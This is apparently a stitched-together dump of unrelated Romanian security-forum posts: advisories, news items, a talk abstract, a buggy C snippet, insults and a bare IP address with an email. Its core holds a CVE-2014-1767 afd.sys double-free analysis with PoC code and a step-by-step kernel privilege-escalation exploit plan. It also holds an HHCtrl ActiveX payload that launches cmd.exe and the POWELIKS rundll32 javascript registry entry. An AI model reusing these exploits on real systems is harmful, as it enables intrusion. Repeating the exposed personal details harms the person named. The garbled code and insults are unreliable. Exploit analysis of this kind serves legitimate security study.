Un exemplu de anul trecut. Cum firma Distinct "a avut grija" de Evomag. Bogdan Belu, CEO Distinct, a vorbit la Internet and Mobile World despre probleme si solutii de scalabilitate in cazuri de trafic ridicat. Prezentarea s-a numit "Studiu de caz: Cum a ajutat Distinct pe evoMAG.ro sa faca fata varfului de trafic Blackfriday 2013". Sumar: Scalarea website-ului tau pentru a accepta o crestere mare de clienti intr-o perioada scurta de timp este o incercare pentru toate partile implicate (administratori de retea, datacenter, dezvoltatori software, webmasteri). Aceasta prezentare este despre cum am scalat website-ul retailer-ului IT evoMAG.ro - electrocasnice si electrice online la cel mai bun pret in timpul evenimentului Blackfriday 2013 si care au fost probleme comune si solutiile identificate. Slides "Studiu de caz: Cum a ajutat Distinct pe evoMAG.ro sa faca fata varfului de trafic Blackfriday 2013" (PDF, English) Video aici: IMWORLD 2014 - Prezentare Bogdan Belu: Studiu de caz: Cum a ajutat Distinct pe evoMAG.ro sa faca fata varfului de trafic Blackfriday 2013

@MrGrj : - strstr - Parcurge sirul de caractere - strcpy - Parcurge sirul de caractere - strlen - Parcurge sirul de caractere Evita strlen (specificand dimensiunea) si strstr (procesand manual sirul). Muie em.

Citeste si intelege codu boss. Ai zis sa fie O(n).

#include <stdio.h> int main() { char sir_initial[] = "Ana are mere!"; char sir_inlocuire[] = "_spatiu_"; char sir_nou[1024] = {0}; size_t sir_lungime = 13; size_t sir_inloc_lungime = 8; int pos_nou = 0; int i = 0; int c = 0; while(sir_initial) { if(sir_initial == ' ') { int x = pos_nou; pos_nou = pos_nou + sir_inloc_lungime; while(sir_initial && sir_initial != ' ') sir_nou[pos_nou++] = sir_initial[i++]; strncpy(sir_nou + x, sir_inlocuire, sir_inloc_lungime); i++; } else sir_nou[pos_nou++] = sir_initial[i++]; printf("%s\n", sir_nou); } return 0; }

Poate dupa ce se termina conferinta se publica si inregistrarile prezentarilor (video) si prezentarile (pdf/pptx) pe site.

Duie MIICOT.

[h=2]WordPress 4.0.1 Security Release[/h] Posted November 20, 2014 by Andrew Nacin. Filed under Releases, Security. WordPress 4.0.1 is now available. This is a critical security release for all previous versions and we strongly encourage you to update your sites immediately. Sites that support automatic background updates will be updated to WordPress 4.0.1 within the next few hours. If you are still on WordPress 3.9.2, 3.8.4, or 3.7.4, you will be updated to 3.9.3, 3.8.5, or 3.7.5 to keep everything secure. (We don’t support older versions, so please update to 4.0.1 for the latest and greatest.) WordPress versions 3.9.2 and earlier are affected by a critical cross-site scripting vulnerability, which could enable anonymous users to compromise a site. This was reported by Jouko Pynnonen. This issue does not affect version 4.0, but version 4.0.1 does address these eight security issues: Three cross-site scripting issues that a contributor or author could use to compromise a site. Discovered by Jon Cave, Robert Chapin, and John Blackbourn of the WordPress security team. A cross-site request forgery that could be used to trick a user into changing their password. An issue that could lead to a denial of service when passwords are checked. Reported by Javier Nieto Arevalo and Andres Rojas Guerrero. Additional protections for server-side request forgery attacks when WordPress makes HTTP requests. Reported by Ben Bidner (vortfu). An extremely unlikely hash collision could allow a user’s account to be compromised, that also required that they haven’t logged in since 2008 (I wish I were kidding). Reported by David Anderson. WordPress now invalidates the links in a password reset email if the user remembers their password, logs in, and changes their email address. Reported separately by Momen Bassel, Tanoy Bose, and Bojan Slavkovi? of ManageWP. Version 4.0.1 also fixes 23 bugs with 4.0, and we’ve made two hardening changes, including better validation of EXIF data we are extracting from uploaded photos. Reported by Chris Andrè Dale. We appreciated the responsible disclosure of these issues directly to our security team. For more information, see the release notes or consult the list of changes. Download WordPress 4.0.1 or venture over to Dashboard ? Updates and simply click “Update Now”. Already testing WordPress 4.1? The second beta is now available (zip) and it contains these security fixes. For more on 4.1, see the beta 1 announcement post. More info: https://wordpress.org/news/2014/11/wordpress-4-0-1/

Brazilian banks lost a great chance to be ahead in Security The biggest Brazilian TV channel, presents on last Sunday, a story about carders gang responsible for the “first EVM clone” case. According reporter, the gang had a hacker, called “director” by a member of gang, which was responsible for technology. Then the other members changed electronic circuits on point-of-sales machines to store pin and card during a transaction. After some days, carders collect data using Bluetooth and then clone chip information to blank cards. That is enough to begin to take money on ATM and buying at some electronic stores. The gang members bought electronics goods, spent money on nightlife and bought a house with estimated value of USD 500,000.00 on Rio de Janeiro, using money raised on frauds. The victims that claimed for the items not bought had reimbursement denied because according banking the pin and chip combination “cannot” be violated. During story, the FEBRABAN director said this situation only occurs with bank institutions that did not implement full security features, available on EVM technology. Also affirmed that in 2014, all Brazilian banks has implemented full security. Why you did not implemented this before? That is a good question and we probably know the response. It is not because they did not have knowledge about that security features. It is probably because it is faster and cheaper to implement without all features. That is what we called “Security by obscurity”, when they think it is safe just because the common people does not know how that stuff works. Another dictate says “Cheap is Expensive” and this kind of frauds has been classified as money loss. Unfortunately, accountants cannot calculate the client loss with time calling customer center and angry to take care on an issue that is not his responsibility. This formula is repeatedly used in many places, where they prefer to delivery something fast and unsafe or with minimal security. Sometimes, the absence of human resources to do the job may be the reason for some enterprises. Cyber Manifesto for Security Changes One of items listed on Cyber Manifesto for Security Changes, is to call business administrators for security governance. Looks like obvious, if you run a business, you should care with security of your customers and business but the daily reality is different as we can see with this TV story. The absence of security, alarms US bank institutions that is planning the deliverable of EVM cards on next year. A fraud seen in Brazil, can be quickly used in Europe or North America, faster than the solution to solve it. In terms of fraud, the Brazilians are on top of list, because as well said by Fabio Assolini – “Brazil has some of the most creative and active criminals specializing in credit card cloning” – in his article called Tips for using ATMs and avoiding credit card cloning. Brazil has some of the most creative and active criminals specializing in credit card cloning – Fabio Assolini Conclusion One more time, companies lost opportunity to protect itself before bad things happens. Many times, we, security professionals avoid treating business like a lotto or a casino roulette, but sometimes we need to take risks due a small budget. Pay attention when we alert about fraud risk and let Information Security help the business to grow healthy. Image Credit: Claran McGuiggan Sursa: https://www.linkedin.com/today/post/article/20141118004108-8638059-brazilian-banks-lost-a-great-chance-to-be-ahead-in-security

// Nu am mai citit

IP: 95.19.205.12 Mail: vipvideos1234@gmail.com

Black Hat Usa 2014 - Exploit: Abusing Performance Optimization Weaknesses To Bypass Aslr Description: The primary goal of ASLR is to effectively randomize a program's memory layout so that adversaries cannot easily infer such information. As ASLR is a critical defense against exploitation, there have been tremendous efforts to evaluate the mechanism's security. To date, previous attacks that bypass ASLR have focused mostly on exploiting memory leak vulnerabilities, or abusing non-randomized data structures. In this presentation, we leverage vulnerabilities introduced by performance-oriented software design to reveal new ways in which ASLR can be bypassed. In addition to describing how vulnerabilities originate from such designs, we will present real attacks that exploit them. First, we analyze general hash table designs for various programming languages (JavaScript, Python, Ruby). To optimize object tracking for such languages, their interpreters may leak address information. Some hash table implementations directly store the address information in the table, whileothers permit inference of address information through repeated table scanning. We exhaustively examined several popular languages to see whether each of them has one or both of these problems, and present how they can be leveraged. As a concrete example, we demonstrate how address information can be leaked in the Safari web browser by simply running some JavaScript. Second, we present an analysis of the Zygote process creation model, which is an Android operating system design for speeding up application launches. The results of our examination show that Zygote weakens ASLR because all applications are created with largely identical memory layouts. To highlight the severity of this issue, we demonstrate two different ASLR bypass attacks using real applications - Google Chrome and VLC Media Player. For More Information Please visit : - Black Hat | Home

CVE-2014-1767 Afd.sys double-free vulnerability Analysis and Exploit [0x00]. Introduction First, I would like to present the reasons why I would focus on this vulnerability, (1) This afd.sys dangling pointer vulnerability was named as the best privilege escalation vulnerability in pwnie awards 2014. (2) The vul type was double-free, It woulb be very interesting. (3) So far, there’s no exp codes exposed, so it’s challenging and exciting to finish one exploit.. OK, now let’s go to our work, our experiment OS is Windows 7(6.1.7601) 32 bit. [0x01]. Vulnerability Root cause analysis A. poc overview Our most important reference was the paper : http://www.siberas.de/papers/Pwn2Own_2014_AFD.sys_privilege_escalation.pdf, from the description of paper, we can get our poc as follows: ================================================= #include <windows.h> #include <stdio.h> #pragma comment(lib, “WS2_32.lib”) int main() { DWORD targetSize = 0×310 ; DWORD virtualAddress = 0×13371337 ; DWORD mdlSize=(0×4000*(targetSize-0×30)/8)-0xFFF-(virtualAddress& 0xFFF) ; static DWORD inbuf1[100] ; memset(inbuf1, 0, sizeof(inbuf1)) ; inbuf1[6] = virtualAddress ; inbuf1[7] = mdlSize ; inbuf1[10] = 1 ; static DWORD inbuf2[100] ; memset(inbuf2, 0, sizeof(inbuf2)) ; inbuf2[0] = 1 ; inbuf2[1] = 0x0AAAAAAA ; WSADATA WSAData ; SOCKET s ; sockaddr_in sa ; int ierr ; WSAStartup(0×2, &WSAData) ; s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) ; memset(&sa, 0, sizeof(sa)) ; sa.sin_port = htons(135) ; sa.sin_addr.S_un.S_addr = inet_addr(“127.0.0.1?) ; sa.sin_family = AF_INET ; ierr = connect(s, (const struct sockaddr *)&sa, sizeof(sa)) ; static char outBuf[100] ; DWORD bytesRet ; DeviceIoControl((HANDLE)s, 0x1207F, (LPVOID)inbuf1, 0×30, outBuf, 0, &bytesRet, NULL); DeviceIoControl((HANDLE)s, 0x120C3, (LPVOID)inbuf2, 0×18, outBuf, 0, &bytesRet, NULL); return 0 ; } ================================================= With WinDbg, we got following crash information: ================================================= BAD_POOL_CALLER (c2) The current thread is making a bad pool request. Typically this is at a bad IRQL level or double freeing the same allocation, etc. Arguments: Arg1: 00000007, Attempt to free pool which was already freed Arg2: 00001097, (reserved) Arg3: 08bd0002, Memory contents of the pool block Arg4: 854b2a20, Address of the block of pool being deallocated Debugging Details: —————— POOL_ADDRESS: 854b2a20 Nonpaged pool FREED_POOL_TAG: Mdl STACK_TEXT: 8d524a6083f6dc6b000000c2 00000007 00001097 nt!KeBugCheck2+0x68b 8d524ad8 83ed8ec2 854b2a20 00000000 8636d260 nt!ExFreePoolWithTag+0x1b1 8d524aec 88787eb0 854b2a20 00000000 8876a89f nt!IoFreeMdl+0×70 8d524b08 8876a8ac00000000 00000001 05244d85 afd!AfdReturnTpInfo+0xad 8d524b44 8876bbba 05244d2d 000120c3 8876ba8c afd!AfdTliGetTpInfo+0×89 8d524bec 887702bc 854a2db8 86472720 8d524c14 afd!AfdTransmitPackets+0x12e 8d524bfc 83e83593 864727208540f5508540f550 afd!AfdDispatchDeviceControl+0x3b ================================================= We can get the IoControl Code from stack: kd> dd 8d524d04 8d524d04 8d524d34 83e8a1ea 00000050 00000000 8d524d14 00000000 00000000 001cf984 000120c3 ======================================== It is Io Control Code 0x120C3 which trigger the system crash, and the problem was double-free, and the object is MDL object. From the call stack, we know AfdTransmitPackets will be our main job, but we must finish analyzing function AfdTransmitFile first, because 0x120C3 was the second Device Io Control call, the first IoControlCall Code was 0x1207F, and in this call we reach AfdTransmitFile, and we will see this was just the first FREE happened ! So, We will Analyze from function AfdTransmitFile. B. Analysis of First IO CONTROL CALL a. Analysis of AfdTransmitFile AfdTransmitFile have two arguments, arg1=pIrp, arg2=pIoStackLocation, function can access user input by arg2. We have set some special value in inbuf1 in POC. We guess these values was used to control the execution flow., after reversing and debugging, we found the following ‘if’ Conditions would be TRUE, and we will reach the invoking to function AfdGetTpInfo. ============================ AfdTransmitFile(pIrp, pIoStack): inputBufferLen >= 0×30 inputBuffer & 0×3 == 0 inputBuffer < 0x7fff0000 memcpy(tempBuf, userBuf, 0×30) ; if(*(DWORD*)tempBuf+0×28) & 0xFFFFFFC8 == 0) if(*(DWORD*)tempBuf+0×28) & != 0×30) if(*(DWORD*)tempBuf+0×28) & 0×30 == 0) tpInfo = AfdGetTpInfo ( 3 ) // if we satisfiy all the cnoditions above, we’ll reach the call to AfdGetTpInfo ============================= b. Analysis of AfdTliGetTpInfo The code above shows if our inputbuf1 satisfied those conditions, we will reach a call to AfdTliGetTpInfo, this function generally return one pointer to TpInfo structure, but what’s a TpInfo structure ? By reversing some functions (AfdTliGetTpInfo, AfdReturnTpInfo, AfdAlocateTpInfo, AfdnitializeTpInfo) and debugging, we got the following definition: ======================== struct TpInfo { … TpElement *pElemArray ; // +0×20, pointer to TpElement Array … ULONG elemCount ; // +0×28, element number in pElemArray Array … BYTE isOuterMem ; // +0×32, whether pElemArray stores outside TpInfo … } struct TpElement { int flag ; // +0×00 ULONG length ; // +0×04 PVOID virtualAddress ; // +0×08 PMDL pMdl ; // +0x0C ULONG reserved1 ; ULONG reserved2 ; } ; =============================== AfdTliGetTpInfo function in IDA: The figure shows the C like code to AfdTliGetTpInfo, this function would get one TpInfo structure fromLookaside list, for ExAllocateFromNpagedLookasideList, we get its key flow reversing code: ====================== TpInfo* __stdcall ExAllocateFromNPagedLookasideList(PNPAGED_LOOKASIDE_LIST Lookaside) { *(Lookaside+0x0C) ++ ; tpInfo = InterlockedPopEntrySList( Lookaside ) if( tpInfo == NULL) { *(Lookaside+0×10)++; tpInfo = AfdAllocateTpInfo(NonPagedPool,0×108 ,0xc6646641) ; } return tpInfo } ======================= For AfdAllocateTpInfo, its C like reversing code is here: ============================ TpInfo * AfdAllocateTpInfo(POOL_TYPE PoolType, SIZE_T NumberOfBytes, ULONG Tag) { p = ExAllocatePoolWithTagPriority(NonPagedPool, 0×108 ,0xc6646641) ; AfdInitializeTpInfo(p, 3, 3, 1) ; } ============================ And for AfdInitializeTpInfo, it simply initializes one TpInfo structure, following code shows the initialized value of some structure member we are interested. ======================== AfdInitializeTpInfo(tpInfo, elemCount, stacksize, x) { …. tpInfo->pElemArray = tpInfo+0×90 tpInfo->elemCount = 0 tpInfo->isOuterMem = false …. } ========================= After debugging and tracing we found , the execution flow will be : ExAllocateFromNPagedLookasideList->AfdAlloceteTpInfo,AfdInitializeTpInfo, and after all these function executed, we got one TpInfo structure which is 0×108 bytes and has its pElementArray initialized as tpInfo+0×90, elemCount as 0, and isOuterMem as 0, for member isOuterMem, we say if the element number in pElemArray greater than 3, than we store the elements out of the tpInfo structure, we will allocate another buffer to store them, and we will set isOuterMem to 1. Now let’s back our mind to function AfdTransmitFile, we have just get one tpInfo structure by AfdGetTliTpInfo, and what to do next ? After we pass the if conditions, we will call IoAllocateMdl to Allocate one MDL object, and the arguments used to allocate MDL are from our inbuf1 ! this is exciting ! user buf control MDL’s virtualAddress and length !, next When we get the MDL pointer, we will try to lock the pages it described by MmProbeAndLockPages ! but , unfortunately , since the virtual address space we supplied is invalid ! (0×13371337~0×13371337+length) , we’ll get an exception ! and we will flow to the exception handler ! In the exception Handler , we will call function AfdReturnTpInfo ! This is our vul function, it’s so important that I nearly reversed all its asm code to C code , following is the result : =========================== for(int i = 0 ; i < *(tpInfo+0×28) ; i++) { PTPELEMENT tpElemArray = *(DWORD*)(tpInfo + 0×20) ; PTPELEMENT tpElement = tpElemArray + i*0×18 ; if(*(tpElement) & 0×02 == 0) { if(*(tpElement) < 0) { PMDL pMdl = *(DWORD*)(tpElement+0x0C) ; if(pMdl != NULL) { if(pMdl->MdlFlags & 0×02) { MmUnlockPages(pMdl) ; } // we free MDL // dangling Pointer here ! IoFreeMdl(pMdl) ; }}}} if(*(BYTE*)(tpInfo+0×32) != 0) { ExFreePoolWithTag(*(DWORD*)(tpInfp+0×20), 0C6646641h) ; *(BYTE*)(tpInfo+0×32) = 0 ; } if(arg2) // in our debugging , arg2=1 { // push TpInfo in lookaside list ExFreeToNPagedLookasideList(AfdGlobalData+0×178, tpInfo) ; } else { AfdFreeTpInfo(tpInfo) ; // ExFreePoolWithTag } =========================== In this function, we see, it simply enumerate all the elements in pElemArray, elementCount indicates the total elements in the array , it try to free the MDL object if the element stores one. The problem is it didn’n clear the pMdl pointer ! and it didn’t clear elemCount in TpInfo !, that means, if you have the ability to call this function AfdReturnTpInfo once again with this tpInfo, all the obsolete value will be treated available ! then, Double-free bug occurs ! Sounds exciting, we found the bug and know how to design it, but how can we call AfdReturnTpInfo once again with the TpInfo in the lookaside list. Note, in AfdReturnTpInfo it put the TpInfo pointer to lookaside list. So let’s see what the poc code do. C: The second Device io control CALL analysis a. AfdTransmitPackets The second call, Io control code is 0x120C3, and the AfdTransmitPackets will be invoked, the function’s pseudo code is like this: ==================================== __fastcall AfdTransmitPackets(PIRP Irp, PIO_STACK_LOCATION IoStack) { IoStack->InputBufferLength >= 0×10 IoStack->Type3InputBuffer & 3 == 0 IoStack->Type3InputBuffer < 0x7fff0000 memcpy(tempBuf, IoStack->Type3InputBuffer, 0×10); *(DWORD*)(tempBuf+0x0C) & 0xFFFFFFF8 == 0 *(DWORD*)(tempBuf+0x0C) & 0×30 != 0×30 *(DWORD*)(tempBuf) != 0 *(DWORD*)(tempBuf+4) != 0 *(DWORD*)(tempBuf+4) <= 0x0AAAAAAA // if we satisfy all the above conditions, we arrive here // user controled argument for AfdTliGetIpInfo ! AfdTliGetTpInfo( *(DWORD*)(tempBuf+4) ) } ===================================== We have set inbuf2 : *(inbuf2) =1, *(inbuf+4)=0x0AAAAAAA, with these values we can reach the call to AfdTliGetTpInfo and the argument will be 0x0AAAAAAA which we specified. We have analzed the function AfdTliGetTpInfo, so we know it will pop one tpInfo structure from the lookaside list if the list is not empty ! Of course its not empty we just push one in ! so , the tpInfo structure we get from the list is just the first one with obsolete values inside it. And then in AfdGetTliTpInfo we reached the if condition because of 0x0AAAAAA>3, so we will call ExAllocatePool, but the allocation size is 0×18*0x0AAAAAAA == 0xFFFFFFF0 bytes ! that’s such big size in 32 bit os that we got a exception again ! This time in this exception handler we arrived AfdReturnTpInfo again ! So , that fits our plan, Obsolete TpInfo called by AfdReturnTpInfo, then double free bug occur ! D. root cause summary [1] first device io control will call AfdTransmitFile, in this function we will get one TpInfo structure by calling AfdTliGetTpInfo, and we will allocate one MDL object using user supplied virtual address and length, and fill the MDL address to TpInfo, next when we try to lock pages by calling MmProbeAndLockPages we got an exception because we give the mdl invalid address range !, in exception handler , programme call AfdReturnTpInfo simply free mdl and push TpInfo in the list, the bug is all obsolete values include elemCount and pMdl is still in the strcture and not cleared ! [2]second io control call AfdTransmitPackets internally, this function will simply call AfdGetTpInfo with our user data as its parameter, we set it to 0x0AAAAAAA, when executing AfdGetTpInfo, the TpInfo used in [1] is poped and used, but next we will got an exception when try to allocate large memory, and the exception handler will call AfdReturnTpInfo, in AfdReturnTpInfo, the obsolete values are treated as available, so double-free bug occus ! [0x02]. Double-free Vulnerability exploit a. general steps:(from the PDF paper) [1]. Invoke DeviceIoControl with IoControlCode = 0x1207F, free MDL Object [2]. Create one kernel object X to occupy the freed space [3] . Invoke DeviceIoControl with IoControlCode = 0x120C3, and now because double-free bug we’ll free the object X we just created [4]. Occupy the freed object X space with our controlled data (double free to use after free) [5]. Try to invoke one function which can operate on the Object X, and the function have the ability to finish one ‘any dword write to any address’, consider in [4] we have controlled the object fileds, so this can be possible, all needed is the function have some internal statements to use our object content as address ! if we find such object with this perfect function, we will try to hijack HalDispatchTable [6] in user mode trigger HalDispatchTable function invoked, than we can flow to kernel mode shellcode b. What’s the Object X ? Object X is used as use-after-free object, there are two restrictions here: (1) the allocated size should be equal as the freed MDL size (2) the object must have some functions which we can internally finish one ‘anywhere write anything’ for (1), we don’t need to worry, because we can control the freed MDL size !, as mentioned above , AfdTransmitFile allocate MDL using our supplied virtual address and length. So we can control MDL size. More detail: pages = ((Length & 0xFFF) + (VirtualAddress & 0xFFF) + 0xFFF)>>12 + (length>>12) freedSize = mdlSize = pages*sizeof(PVOID) + 0x1C for (2), it’s tricky and hard to find such perfect function, we reference the PDF paper and found ‘WorkerFactory’ Object. We can create WorkerFactory object by NtCreateWorkerFactory. And the perfect function is NtSetInformationWorkerFactory, let’s have a look at its code: We find there’s one assignment statement inside, and after analysis the control flow would reach here when (arg2==8 && *arg3!=0), we can set *arg3 = ShellCode, *(*object+0×10)+0x1C = &HalDispatchTable[1], then we can wirte our shellcode address to HalDispatchTable ! C. How can we occupy the freed WorkerFactory object using our controlled data ? The user mode function VirtualAlloc have no ability to allocate kernel non-paged pool memory for us, so the solution is like the idea of NtSetInformationWorkerFactory, we should find one Nt* kernel function, and it has the ability to allocate kernel memory and can copy our user data to the allocated pool !, with the hint in PDF, we focus on the function NtQueryEaFile: Inside this function ?it will simply call: p = ExAllocatePoolWithQuotaTag(NonPagedPool, EaLength, 0x20206F49) memcpy(p, EaList) EaLength and Ealist is user controlled !, This function is perfect for us, it can allocate nonpaged pool memory and copy our data to that buffer. Although it will free this pool before it exit, the pool has only its first several bytes corrupted. And there’s one problem we should notice, here we use ExAllocatePoolWithQuotaTag rather than ExAllocatePoolWithTag, they are different in allocation size, ExAllocatePoolWithQuotaTag internally call ExAllocatePoolWithTag(PoolType, length+4, tag). So, if we would like to occupy the corrupted object successfully, we need specify EaLength=ObjSize-4. c. what’s the allocation size of WorkerFactory Object ? Only by identifying this can we do a serie of occupy-free , to find this you should trace and debug the following functions: NtCreateWorkerFactory->ObpCreateObject->ObpAllocateObject->ExAllocatePoolWithTag. And in our environment this allocation size is 0xA0 bytes with 0×28 bytes additional information wrapped the object body. In the first 0×28 bytes, there contains object header information, we should set valid data here in case the fail when invoking ObReferenceObjectByHandle in NtSetInformationWorkerFactory. d. exploit flow design, su system successfully ! [1]. Invoking DeviceIoControl with code 0x1207F, by design the input virtual Address and length, we let kernel allocate the MDL object in size 0xA0, and finally kernel will free it.. [2] NtCreateWorkerFactory create new WorkerFactory object, because of the size, this object will occupy the freed memory space in [1] [3] Invoking DeviceIoControl with code 0x120C3, by design the input , we can lead the control flow to an double free bug, and this will simply free the memory our new WorkerFactory Object just occupied ! [4] NtQueryEaFile, this will set controlled data (fake object) to the memory just freed in [3] [5] NtSetInformationWorkerFactory operates on the fake object and internally it will cause a HalDispatchTable write, we change the DWORD at HalDispatchTable+4 to ShellCode address. [6] trigger from user mode by call NtQueryIntervalProfile e. Say no to BSOD, hack HandleTableEntry We found although we can get system command shell, when we close the exp exe programme, the system will got blue screen ! It’s easy to understand the root cause, beeause we have destroy the WorkerFactory object , but system isn’t aware of this, when the exe process exit, it will free all handle resources and we would got invalid memory access exception. =============== 93da9b74 83e8d3d8 00000000 bad0b124 00000000 nt!MmAccessFault+0×106 93da9b74 8409210f 00000000 bad0b124 00000000 nt!KiTrap0E+0xdc 93da9c38 840c0ba9 890d33b0 95e7c288 853f4030 nt!ObpCloseHandleTableEntry+0×28 93da9c68 840a8f86 890d33b0 93da9c7c 890012c8 nt!ExSweepHandleTable+0x5f 93da9c88 840b6666 bee06ad8 00000000 853f36a0 nt!ObKillProcess+0×54 93da9cfc 840a8bb9 00000000 ffffffff 002dfa38 nt!PspExitThread+0x5db 93da9d24 83e8a1ea ffffffff 00000000 002dfa44 nt!NtTerminateProcess+0x1fa ================= We found the solution in ExSweepHandleTable: ====================== Handle = 4 while(ObjectTable->HandleCount) { HandleTableEntry = ExpLookupHandleTableEntry(ObjectTable, Handle) ; if(*((DWORD*)(HandleTableEntry) & 1) { ObpCloseHandleTableEntry(…) ; } Handle += 4 } ====================== As you see, ExSweepHandleTable will enumerate every handle’s handleTableEntry and the ‘if’ condition will check the first DWORD in HandleTableEntry, our solution is to set this filed to NULL, than we can bypass the free flow to the specific Handle ! The releationship between Handle and HandleTableEntry is like this, we got this by reversing ExpLookupHandleTableEntry. HandleTableEntry = *(DWORD*)ObjectTable + 2*(Handle & 0xFFFFFFC0) [0x03] Last For win 7 x64, structure offset needed modified, and you should use CreateRoundRectRgn to eat kenel memory. For Windows 8, which expoit would be more challenging , please reference the PDF NtSetInformationWrokerFactory and NtQueryEaFile are all treasure ! BY : 0x710DDDD 2014-11-19 afd_1767_Exp Sursa: [EnglishVersion]CVE-2014-1767 Afd.sys double-free vulnerability Analysis and Exploit - Binary Vuln Analysis - Vulnerability Analysis - SecNiu

Welcome to the free malware analysis webservice by Payload-Security.com. You can submit files for analysis using the form below. All submitted files will be analyzed using our innovative Hybrid Analysis technology. Link: Payload Security - VxStream Sandbox Public Beta - Malware Analysis

Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) Published: November 18, 2014 Version: 1.0 Executive Summary This security update resolves a privately reported vulnerability in Microsoft Windows Kerberos KDC that could allow an attacker to elevate unprivileged domain user account privileges to those of the domain administrator account. An attacker could use these elevated privileges to compromise any computer in the domain, including domain controllers. An attacker must have valid domain credentials to exploit this vulnerability. The affected component is available remotely to users who have standard user accounts with domain credentials; this is not the case for users with local account credentials only. When this security bulletin was issued, Microsoft was aware of limited, targeted attacks that attempt to exploit this vulnerability. This security update is rated Critical for all supported editions of Windows Server 2003, Windows Server 2008, Windows Server 2008 R2, Windows Server 2012, and Windows Server 2012 R2. The update is also being provided on a defense-in-depth basis for all supported editions of Windows Vista, Windows 7, Windows 8, and Windows 8.1. For more information, see the Affected Software section. The security update addresses the vulnerability by correcting signature verification behavior in Windows implementations of Kerberos. For more information about the vulnerability, see the Frequently Asked Questions (FAQ) subsection for the specific vulnerability. For more information about this update, see Microsoft Knowledge Base Article 3011780. Sursa: https://technet.microsoft.com/library/security/MS14-068

400 Hackers Are Defending NATO in a Massive Cyberwar Game November 18, 2014 // 05:52 PM EST ?These days—in the wake of persistent attacks from hostile actors—NATO is taking cyber war very seriously. It’s part of the reason why it’s beginning its largest cyber attack exercise ever today, to better prepare member nations for the modern digital battlefield. “This exercise will test our systems to make sure that NATO keeps pace with that evolving threat,” said Ambassador Sorin Ducaru, NATO Assistant Secretary General for Emerging Security Challenges. Over 400 personnel from across alliance nations will be participating in the exercise from the comfort of their home countries. Though the drills will aim at combating threats in an organized bloc. In the last year alone, hackers from suspected enemy states have stolen sensitive intelligence from NATO networks, or in the case of Chinese spies in July—valuable Canadian scientific research and development—from right under the noses of intelligence agencies. According to Ducaru the “the cyber threat” isn’t simply one-off attacks, either. Instead, hackers exploiting NATO systems is a “daily reality,” requiring persistent international coordination to combat the threat. For NATO, the exercises are all about improving efforts and communication among member nations, “against a series of targeted cyber incidents involving a NATO mission network.” As in, when NATO is attacked, it sets off alarm bells for the alliance to properly engage potential attackers. This exercise will test our systems to make sure that NATO keeps pace with that evolving threat And there’s no mistaking how seriously NATO sees new digital enemies. In the words of the most powerful military collective in the world, cyber attacks are potentially “as harmful to modern societies as a conventional attack.” But attacks on NATO infrastructure are nothing new. During tensions over Crimea in March, NATO websites and social media accounts were attacked by pro-Russian hackers. Then again in October, with hostilities still simmering with the Vladimir Putin regime, NATO computers were exploited by Russian hackers who went on to access networks in the White House. In a proactive move, NATO looks to be interested in upgrading its computer technologies, potentially in an effort to modernize its systems to be more secure. In two separate requests for contracts in the US and Canada, NATO is asking for expertise in an effort for “Modernization and Rationalization of the NATO Technology Infrastructure.” The plan is for 44 sites to be upgraded into cloud-based technologies over the next few years, with private consultants providing key expertise. The latest NATO exercises come on the heels of real world military exercises in Ukraine in September, along with ongoing deployments of NATO troops in Poland. All those efforts are largely seen as acts of solidarity with regional powers opposing Russia. Ultimately, with a growing list of enemy actors exploiting NATO networks, it really is high time the western military alliance sharpen its cyber defense skills before another intelligence loss, or worse. Sursa: http://motherboard.vice.com/read/nato-is-sharpening-its-cyber-war-defenses

Legiunea pulii. Copii prosti.

In numele fisierului: "infected". Merge. Si functioneaza asa: <OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1> <PARAM name="Command" value="ShortCut"> <PARAM name="Button" value="Bitmap::shortcut"> <PARAM name="Item1" value=",cmd.exe,/c calc ,"> <PARAM name="Item2" value="273,1,1"> </OBJECT> <SCRIPT> x.Click(); </SCRIPT> Acel classid identifica HHCtrl Object, un ActiveX numit IE HTML Help Control.

POWELIKS Levels Up With New Autostart Mechanism by Roddell Santos (Threats Analyst) Last August, we wrote about POWELIKS’s malware routines that are known for hiding its malicious codes in the registry entry as part of its evasion tactics. In the newer samples we spotted, malware detected as TROJ_POWELIKS.B employed a new autostart mechanism and removes users’ privileges in viewing the registry’s content. As a result, users won’t be able to suspect that their systems are already infected by the POWELIKS malware. This new autostart technique is fairly new to the threat landscape, a technique that is not currently covered by Autoruns for Windows. This Windows utility shows all files and registries that will execute upon Windows startup. When executed, POWELIKS creates the following registry entry: [HKEY_CURRENT_USER\Software\Classes\clsid\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32] (Default)=”rundll32.exe javascript:\”\\..\\mshtml,RunHTMLApplication \”;eval…….” a=”#@~^XHoAAA=……” Normally, users will see the following screenshots via the registry editor: Figure 1: The created key of Poweliks Based on the above screenshot, it would seem that the malware isn’t present in the registry. However, the contents of the POWELIKS malware is actually hidden and successfully hides its code by removing the user’s permission in the specific registry. Figure 2: User’s permission profile Best Practices: How to add permissions Users can navigate their way around this malware technique and view the registry content by adding the user name or group to the registry key’s permission section. This can be done via the following steps: Open Registry Editor Go to the registry key HKCU\Software\Classes\clsid On the left panel, right click {AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} Highlight the user name In the “Allow” section, select “Full Control” and “Read” (see Figure 3) Click “OK” to save changes Close Registry Editor, then open it again to reflect the changes Figure 3: Updated user’s permission profile Once done, the malware will now be visible as shown below: Figure 4. The visible malware code When the malware creates an entry in HKCU\SOFTWARE\Classes\CLSID, Windows reflects this entry in HKCR\CLSID as shown below. Figure 5. The updated HKCR\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} key Why this CLSID? CLSID is not a known autostart entry. So, why did cybercriminals opt to use this registry and not the typical autostart entries? This CLSID is for Window’s thumbnail cache, which Windows calls whenever a thumbnail for any file is needed – for images, audio, etc. As such, when this CLSID is called, it will execute the entry in HKCR\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 to show the thumbnail of the file as well as the entry of POWELIKS in this key. This in turn, loads POWELIKS every time, as seen in the screenshot below: Figure 6: POWELIKS uses dllhost.exe to load itself on the system. Each dllhost.exe indicates a running POWELIKS. Best Practices: Manual Removal While this threat is continuously evolving as seen in the new evasion tactic, it can be manually removed from the systems via the following steps: Download and execute Microsoft’s Process Explorer Restart in Safe Mode. Select the latest dllhost.exe mother process (see Figure 7) Figure 